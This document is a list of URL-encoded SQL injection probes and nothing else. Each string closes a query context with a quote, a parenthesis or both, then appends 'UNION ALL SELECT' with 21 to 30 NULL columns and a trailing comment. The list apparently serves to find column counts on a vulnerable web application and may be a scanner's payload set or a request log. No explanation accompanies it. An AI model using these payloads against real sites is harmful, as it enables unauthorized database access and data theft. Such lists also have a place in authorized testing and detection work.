foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 